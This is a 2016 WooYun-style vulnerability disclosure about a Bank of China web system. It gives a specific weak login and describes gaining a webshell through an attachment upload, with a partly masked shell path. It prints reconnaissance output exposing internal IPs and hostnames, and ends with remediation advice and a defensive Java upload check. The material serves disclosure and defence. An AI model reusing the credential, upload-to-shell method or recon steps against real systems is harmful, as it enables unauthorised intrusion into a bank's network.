
Weak password on a Bank of China system allows shell upload (crossing the perimeter firewall into the internal network)

2016-06-19 05:55

#1 Discovery method

Found with a general-purpose weak-password detection script: simple, efficient, and extremely damaging.

http://zone.wooyun.org/content/22529

http://zone.wooyun.org/content/21962

Top 500 Chinese names (statistics taken from the national population database)

http://zone.wooyun.org/content/18372

#2 Vulnerability description

https://e.boc.cn/ehome/property/frame/sign.do

One weak password was found: wangwei:000000

In the community management function, adding an attachment is enough to get a shell.

fujian.png



Proof of vulnerability:

https://e.boc.cn/ehome/eshop/ehome-files/eproperty/2016/05/01/Customize14*********.jsp

webshell.jpg





Code area
[/]$ /sbin/ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:50:56:9A:72:2C
    inet addr:21.123.47.151 Bcast:21.123.47.255 Mask:255.255.255.0
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:127879201 errors:0 dropped:0 overruns:0 frame:0
    TX packets:117334178 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:22666975632 (21.1 GiB) TX bytes:32615347620 (30.3 GiB)

eth1 Link encap:Ethernet HWaddr 00:50:56:9A:14:C4
    inet addr:10.123.47.151 Bcast:10.123.47.255 Mask:255.255.255.0
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:51273711 errors:0 dropped:0 overruns:0 frame:0
    TX packets:46856648 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:12233542012 (11.3 GiB) TX bytes:9912431273 (9.2 GiB)

lo Link encap:Local Loopback
    inet addr:127.0.0.1 Mask:255.0.0.0
    UP LOOPBACK RUNNING MTU:65536 Metric:1
    RX packets:238664440 errors:0 dropped:0 overruns:0 frame:0
    TX packets:238664440 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:24040429146 (22.3 GiB) TX bytes:24040429146 (22.3 GiB)

[/]$ cat /etc/hosts
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
21.123.47.146 P1EZECAP01
21.123.47.147 P1EZECAP02
21.123.47.148 P1EZECAP03
21.123.47.149 P1EZECAP04
21.123.47.150 P1EZECAP05
21.123.47.151 P1EZECAP06
21.123.47.152 P1EZECAP07
21.123.47.153 P1EZECAP08
10.123.47.146 P1EZECAP01_gpfs
10.123.47.147 P1EZECAP02_gpfs
10.123.47.148 P1EZECAP03_gpfs
10.123.47.149 P1EZECAP04_gpfs
10.123.47.150 P1EZECAP05_gpfs
10.123.47.151 P1EZECAP06_gpfs
10.123.47.152 P1EZECAP07_gpfs
10.123.47.153 P1EZECAP08_gpfs
21.122.32.116 ZabbixServer
21.123.102.88 nbu3media1
21.123.102.89 nbu3media2
21.123.102.90 nbu3master

[/]$ /sbin/arp -a
? (21.123.47.161) at 00:50:56:9a:3d:95 [ether] on eth0
P1EZECAP05 (21.123.47.150) at 00:50:56:9a:00:55 [ether] on eth0
? (21.123.47.1) at 00:00:0c:9f:f0:2f [ether] on eth0
P1EZECAP01_gpfs (10.123.47.146) at 00:50:56:9a:62:66 [ether] on eth1
P1EZECAP05_gpfs (10.123.47.150) at 00:50:56:9a:79:c7 [ether] on eth1
P1EZECAP03_gpfs (10.123.47.148) at 00:50:56:9a:31:0c [ether] on eth1
P1EZECAP04_gpfs (10.123.47.149) at 00:50:56:9a:6f:8f [ether] on eth1
P1EZECAP07 (21.123.47.152) at 00:50:56:9a:49:62 [ether] on eth0
P1EZECAP08_gpfs (10.123.47.153) at 00:50:56:9a:7b:08 [ether] on eth1
P1EZECAP07_gpfs (10.123.47.152) at 00:50:56:9a:05:f1 [ether] on eth1
P1EZECAP02_gpfs (10.123.47.147) at 00:50:56:9a:56:89 [ether] on eth1

[/]$

Remediation:

Fix the weak password and fix the upload vulnerability.
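One way to close the upload hole named in the remediation, as an added example (not code from the report or from the affected system): a hypothetical `AttachmentStore` that allow-lists attachment extensions and saves each file under a server-generated name. The class name, the allowed types and the storage directory are assumptions.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Locale;
import java.util.Set;
import java.util.UUID;

// Added example: hypothetical attachment store, not the affected system's code.
public class AttachmentStore {
    // Assumed allow-list; anything else, including jsp/jspx, is refused.
    private static final Set<String> ALLOWED = Set.of("png", "jpg", "jpeg", "gif", "pdf", "docx", "xlsx");

    // Returns the lower-cased extension if it is on the allow-list, otherwise throws.
    static String checkedExtension(String clientName) {
        String base = clientName.substring(Math.max(clientName.lastIndexOf('/'), clientName.lastIndexOf('\\')) + 1);
        int dot = base.lastIndexOf('.');
        String ext = dot < 0 ? "" : base.substring(dot + 1).toLowerCase(Locale.ROOT);
        if (!ALLOWED.contains(ext)) {
            throw new IllegalArgumentException("attachment type not allowed: '" + ext + "'");
        }
        return ext;
    }

    // Saves the upload under a server-generated name inside uploadRoot, which must be a
    // directory the servlet container neither maps to a URL nor compiles as JSP.
    static Path store(String clientName, InputStream data, Path uploadRoot) throws IOException {
        String ext = checkedExtension(clientName);
        Path root = uploadRoot.toAbsolutePath().normalize();
        Path target = root.resolve(UUID.randomUUID() + "." + ext).normalize();
        if (!target.startsWith(root)) { // defence in depth; the name is already server-chosen
            throw new IllegalArgumentException("resolved path escapes upload root");
        }
        Files.copy(data, target); // throws if the file exists; never overwrites
        return target;
    }

    public static void main(String[] args) throws IOException {
        Path root = Files.createTempDirectory("attachments"); // stand-in for a non-web directory
        // Constructed sample names, including the kind of file the report describes.
        for (String name : new String[] {"notice.PNG", "Customize.jsp", "photo.png.jsp", "report.jsp.", "..\\..\\a.jspx"}) {
            try {
                Path p = store(name, new ByteArrayInputStream(new byte[] {1, 2, 3}), root);
                System.out.println("stored   " + name + " -> " + p.getFileName());
            } catch (IllegalArgumentException e) {
                System.out.println("rejected " + name + " (" + e.getMessage() + ")");
            }
        }
    }
}
```

The extension check does not inspect file content; the control that matters most is that the storage directory is never served or executed by the container.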

Source: www.wooyun.org/bugs/wooyun-2016-0204059
